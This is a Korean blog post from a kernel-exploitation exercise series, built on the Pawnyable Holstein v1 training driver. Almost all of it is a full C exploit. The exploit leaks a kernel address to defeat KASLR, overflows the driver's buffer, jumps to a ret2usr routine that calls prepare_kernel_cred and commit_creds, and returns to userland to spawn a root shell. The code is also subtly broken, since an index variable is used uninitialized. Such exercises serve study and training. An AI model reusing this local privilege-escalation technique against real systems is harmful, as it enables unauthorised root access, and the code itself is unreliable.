Kernel Exploit/Exercise
kernel exploit payload - kaslr
wyv3rn
2025. 5. 30. 12:05
728x90
반응형
서론
[ Holstein v1 (LK01) - Pawnyable ] 기준으로 작성하였다.
주소 랜덤화 시 read를 통한 필요 주소 leak 후 offset을 계산하여 이를 적용한다.
즉, 우선 kaslr을 적용하지 않고 leak, offset을 계산하고 이를 반영하면 된다.
Payload
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
int kbuf_size = 0x400;
int global_fd;
void open_dev()
{
global_fd = open("/dev/holstein", O_RDWR);
if (global_fd < 0)
{
puts("[!] Failed to open device");
exit(-1);
}
else
{
puts("[*] Opened device");
}
}
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(void)
{
__asm__ __volatile__(
"mov %cs, user_cs;"
"mov %ss, user_ss;"
"mov %rsp, user_sp;"
"pushf;"
"pop user_rflags;"
);
puts("[*] Saved state");
}
void print_leak(unsigned long *leak, unsigned n)
{
for (unsigned i = 0; i < n; ++i)
{
printf("%u: %lx\n", i, leak[i]);
}
}
unsigned long leak;
void leak_addr(void)
{
unsigned long arry[kbuf_size/8 + 100];
memset(arry,0,sizeof(arry));
read(global_fd, arry, sizeof(arry));
leak = arry[kbuf_size/8+1];
//print_leak(leak, 200);
printf("[*] Leak: %lx\n", leak);
}
void get_shell(void)
{
puts("[*] Returned to userland");
if (getuid() == 0)
{
printf("[*] UID: %d, got root!\n", getuid());
char *argv[] = { "/bin/sh", NULL };
char *envp[] = { NULL };
execve("/bin/sh", argv, envp);
}
else
{
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}
unsigned long user_rip = (unsigned long)get_shell;
void restore_state(void)
{
__asm__ __volatile__(
"swapgs;"
"movq user_ss, %r15;"
"push %r15;"
"movq user_sp, %r15;"
"push %r15;"
"movq user_rflags, %r15;"
"push %r15;"
"movq user_cs, %r15;"
"push %r15;"
"movq user_rip, %r15;"
"push %r15;"
"iretq;"
);
}
unsigned long prepare_kernel_cred;
unsigned long commit_cred;
unsigned long restore_state_addr = (unsigned long)restore_state;
void escalate_privs(void)
{
prepare_kernel_cred = leak - 0xcf0fc;
commit_cred = leak - 0xcefac;
__asm__ __volatile__(
"movq prepare_kernel_cred, %rax;"
"xor %rdi, %rdi;"
"call *%rax;"
"movq %rax, %rdi;"
"movq commit_cred, %rax;"
"call *%rax;"
"movq restore_state_addr, %rax;"
"call *%rax;"
);
}
void exploit()
{
unsigned long payload[kbuf_size/8+2];
int offset;
for(int i =0; i < 128; i++)
{
payload[offset++] = 0xdeadbeefdeadbeef;
}
payload[offset++] = 0xaaaaaaaaaaaaaaaa;
payload[offset++] = (unsigned long)escalate_privs;
unsigned long escal_addr = (unsigned long)escalate_privs;
printf("[*] Prepared payload : escallte_privs addr = %lx\n",escal_addr);
write(global_fd, payload, sizeof(payload));
puts("[!] Error while exploit");
}
int main()
{
save_state();
open_dev();
leak_addr();
exploit();
puts("[!] Error after exploit");
return 0;
}
728x90
반응형